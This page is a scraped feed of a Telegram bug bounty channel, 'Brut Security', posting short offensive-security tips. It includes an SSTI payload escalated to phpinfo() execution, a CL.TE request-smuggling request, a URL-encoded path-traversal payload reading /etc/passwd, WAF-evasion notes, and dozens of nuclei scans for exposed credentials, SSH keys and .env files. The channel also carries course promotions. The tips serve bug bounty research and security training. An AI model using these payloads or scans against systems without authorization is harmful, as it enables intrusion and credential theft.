Brut Security
15.1K subscribers
964 photos
76 videos
292 files
1.01K links
โœ…DM: @wtf_brut
๐Ÿ›ƒWhatsApp: https://wa.link/brutsecurity
๐ŸˆดTraining: https://brutsecurity.com
๐Ÿ“จMail: info@brutsec.com
Download Telegram
๐Ÿ”ฅLEAKEY is a bash script which checks and validates for leaked credentials. The idea behind LEAKEY is to make it highly customizable and easy to add checks for new services.

๐Ÿซกhttps://github.com/rohsec/LEAKEY
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ10โค4๐Ÿ‘4
This media is not supported in your browser
VIEW IN TELEGRAM
Binary or web?
๐Ÿ˜22๐Ÿ—ฟ13๐Ÿ‘3โค1๐Ÿ˜ข1
domains.txt
836.9 KB
๐ŸŒ€Download all bug bounty programs domains in scope items ๐ŸŽฏ

๐Ÿ˜‰Get a full list of domains from active bug bounty programs across platforms like HackerOne, Bugcrowd, Intigriti, and more โ€“ all in one place!๐Ÿ’ฅ

๐Ÿ‘‡๐ŸผStep 1: Download the domains.txt file

๐Ÿ“‚step 2: Extract only main/root domains

`cat domains.txt | awk -F '.' '{print $(NF-1)"."$NF}' | grep -Eo '([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}' | sort -u > main_domains`

๐Ÿ“‚Step 3: Extract all IP addresses:

`grep -Eo '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' domains.txt > ips.txt`

Don't forget to give reactionsโค๏ธ
โค34๐Ÿ”ฅ8๐Ÿ‘6
Hey hunters,
DarkShadow here back again!

๐Ÿ”ฅSSTI to RCE in URL ๐Ÿ’€

POC:
target.com/docs/1.0/123 = not found.

so i tried:
target.com/docs/1.0/?123 = now itโ€™s reflecting in source code like /docs/1.0/?123#

so i tried again:
target.com/docs/1.0/?{{7*7}} = /docs/1.0/?49#

and itโ€™s worked! SSTI payload it executed here๐Ÿ˜

after researching a while, code injection done by /docs/1.0/?{{phpinfo()}}


so guyโ€™s always try be uniq and different. and if guyโ€™s really love to read my buybounty methodologies then follow me in x x.com/darkshadow2bd

#ssti #bugbountytips
๐Ÿ”ฅ30โค5๐Ÿ‘3
This media is not supported in your browser
VIEW IN TELEGRAM
How to manually check for CL.TE Request Smuggling Vulnerabilities:

1๏ธโƒฃ See if a GET request accepts POST
2๏ธโƒฃ See if it accepts HTTP/1
3๏ธโƒฃ Disable "Update Content-Length"
4๏ธโƒฃ Send with CL & TE headers:
POST / HTTP/1.1
Host: <HOST-URL>
Content-Length: 6
Transfer-Encoding: chunked

0

G

5๏ธโƒฃ Send request twice.

If you receive a response like "Unrecognized method GPOST", you've just confirmed a CL.TE vulnerability!

Try this out for yourself in our CL.TE lab:
https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
โค31๐Ÿ”ฅ3๐Ÿ‘1
๐Ÿ˜˜dON'T fORGET tO gIVE rEACTIONS๐Ÿซก
Please open Telegram to view this post
VIEW IN TELEGRAM
โค24
๐ŸšจBB Tip โ€” WAF evasion with weird chars

Hereโ€™s the thing: attackers hide simple payloads (eg. cat /etc/passwd) by stuffing params with backslashes, \x.. hex, IFS, and odd punctuation (|/???/\b**\h). Donโ€™t match raw strings โ€” normalize first, then detect.

๐Ÿ‘‰Quick checks:
Decode repeatedly until stable, then run signatures.
Flag mixed-encoding or repeated escape sequences.
Use allowlists for expected param formats.


๐Ÿ“ŽReference- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#filter-bypassesAC
Please open Telegram to view this post
VIEW IN TELEGRAM
โค15๐Ÿ”ฅ6๐Ÿ‘1๐Ÿ˜1
๐Ÿšจ Find Low Hanging Fruits Using Nuclei AI ๐Ÿšจ

nuclei -list targets.txt -ai "Find exposed AI/ML model files (.pkl, .h5, .pt) that may leak proprietary algorithms or sensitive training data"

nuclei -list targets.txt -ai "Find exposed automation scripts (.sh, .ps1, .bat) revealing internal tooling or credentials"

nuclei -list targets.txt -ai "Identify misconfigured CSP headers allowing 'unsafe-inline' or wildcard sources"

nuclei -list targets.txt -ai "Detect pages leaking JWT tokens in URLs or cookies"

nuclei -list targets.txt -ai "Identify overly verbose error messages revealing framework or library details"

nuclei -list targets.txt -ai "Find application endpoints with verbose stack traces or source code exposure"

nuclei -list targets.txt -ai "Find sensitive information in HTML comments (debug notes, API keys, credentials)"

nuclei -list targets.txt -ai "Find exposed .env files leaking credentials, API keys, and database passwords"

nuclei -list targets.txt -ai "Find exposed configuration files such as config.json, config.yaml, config.php, application.properties containing API keys and database credentials."

nuclei -list targets.txt -ai "Find exposed configuration files containing sensitive information such as credentials, API keys, database passwords, and cloud service secrets."

nuclei -list targets.txt -ai "Find database configuration files such as database.yml, db_config.php, .pgpass, .my.cnf leaking credentials."

nuclei -list targets.txt -ai "Find exposed Docker and Kubernetes configuration files such as docker-compose.yml, kubeconfig, .dockercfg, .docker/config.json containing cloud credentials and secrets."

nuclei -list targets.txt -ai "Find exposed SSH keys and configuration files such as id_rsa, authorized_keys, and ssh_config."

nuclei -list targets.txt -ai "Find exposed WordPress configuration files (wp-config.php) containing database credentials and authentication secrets."

nuclei -list targets.txt -ai "Identify exposed .npmrc and .yarnrc files leaking NPM authentication tokens"

nuclei -list targets.txt -ai "Identify open directory listings exposing sensitive files"

nuclei -list targets.txt -ai "Find exposed .git directories allowing full repo download"

nuclei -list targets.txt -ai "Find exposed .svn and .hg repositories leaking source code"

nuclei -list targets.txt -ai "Identify open FTP servers allowing anonymous access"

nuclei -list targets.txt -ai "Find GraphQL endpoints with introspection enabled"

nuclei -list targets.txt -ai "Identify exposed .well-known directories revealing sensitive data"

nuclei -list targets.txt -ai "Find publicly accessible phpinfo() pages leaking environment details"

nuclei -list targets.txt -ai "Find exposed Swagger, Redocly, GraphiQL, and API Blueprint documentation"

nuclei -list targets.txt -ai "Identify exposed .vscode and .idea directories leaking developer configs"

nuclei -list targets.txt -ai "Detect internal IP addresses (10.x.x.x, 192.168.x.x, etc.) in HTTP responses"

nuclei -list targets.txt -ai "Find exposed WordPress debug.log files leaking credentials and error messages"

nuclei -list targets.txt -ai "Detect misconfigured CORS allowing wildcard origins ('*')"

nuclei -list targets.txt -ai "Find publicly accessible backup and log files (.log, .bak, .sql, .zip, .dump)"

nuclei -list targets.txt -ai "Find exposed admin panels with default credentials"

nuclei -list targets.txt -ai "Identify commonly used API endpoints that expose sensitive user data, returning HTTP status 200 OK."

nuclei -list targets.txt -ai "Detect web applications running in debug mode, potentially exposing sensitive system information."
Please open Telegram to view this post
VIEW IN TELEGRAM
โค8๐Ÿ”ฅ6
๐Ÿ‘‰Check Well Known Files/Paths - A JS console script to paste into console
It will attempt to identify and uncover potentially useful files for enumeration


โžก๏ธScript: https://hackertips.today/cmd/CheckWellKnown.js

๐ŸฅณHow to use:
โ€ข Open the script URL and copy it to clipboard.
โ€ข Open the target site, Inspect โ†’ Console.
โ€ข Paste the script and run.
โ€ข Look for any requests returning HTTP 200, visit those URLs and validate exposure.

๐Ÿ˜ฎWhat to watch for:
โ€ข /.git, /.env, backup files, robots.txt revealing sensitive paths, config files, or public storage with credentials.
โ€ข Any unexpected 200 on predictable filenames.

๐ŸŸขQuick mitigation:
โ€ข Remove or restrict public access to sensitive files.
โ€ข Block common sensitive filenames at the webserver/WAF.
โ€ข Return 403/404 for those paths and avoid leaking contents in error pages.

----------------------------------------------------------------------------
๐Ÿ“– Your Ethical Hacking Journey Starts Here โ†’ topmate.io/saumadip/1391531
๐ŸŽ“ Ready to Skill Up? Enroll Now โ†’ wa.link/brutsecurity
๐Ÿ“ข Join the Community: discord.gg/u7uMFV833h
Please open Telegram to view this post
VIEW IN TELEGRAM
โค18๐Ÿ‘5๐Ÿ”ฅ2
If you liked the posts, tap the heart. That tiny click means a lot. โค๏ธ
Please open Telegram to view this post
VIEW IN TELEGRAM
โค49๐Ÿ”ฅ5
๐ŸฅณDiffRays is a research-oriented tool for binary patch diffing, designed to aid in vulnerability research, exploit development, and reverse engineering.

๐ŸŸข https://github.com/pwnfuzz/diffrays
Please open Telegram to view this post
VIEW IN TELEGRAM
โค10
Hey Hunter's,
Darkshadow here back again!

โ˜ ๏ธNon-parameter LFI๐Ÿ”ฅ

if you try: target.com/../../../../../../etc/passwd
browser redirect to = target.com/etc/passwd

try url encoding:
target.com/..%2F..%2F..%2F..%2Fetc%2Fpasswd
now browser not redirect you to back directory.

#bugbountytips #fli
โค22๐Ÿ‘5๐Ÿ—ฟ5๐Ÿ”ฅ1
Forwarded from Brut Security 2.0
A quick way to find "all" paths for Next.js websites:

console.log(__BUILD_MANIFEST.sortedPages)
javascriptโ€‹:console.log(__BUILD_MANIFEST.sortedPages.join('\n'));
๐Ÿ”ฅ19โค8
If you liked the posts, tap the heart. That tiny click means a lot. โค๏ธ
Please open Telegram to view this post
VIEW IN TELEGRAM
โค30
Forwarded from Brut Security
Common Security Issues in FinanciallyOriented Web Applications
๐Ÿ”ฅ6โค3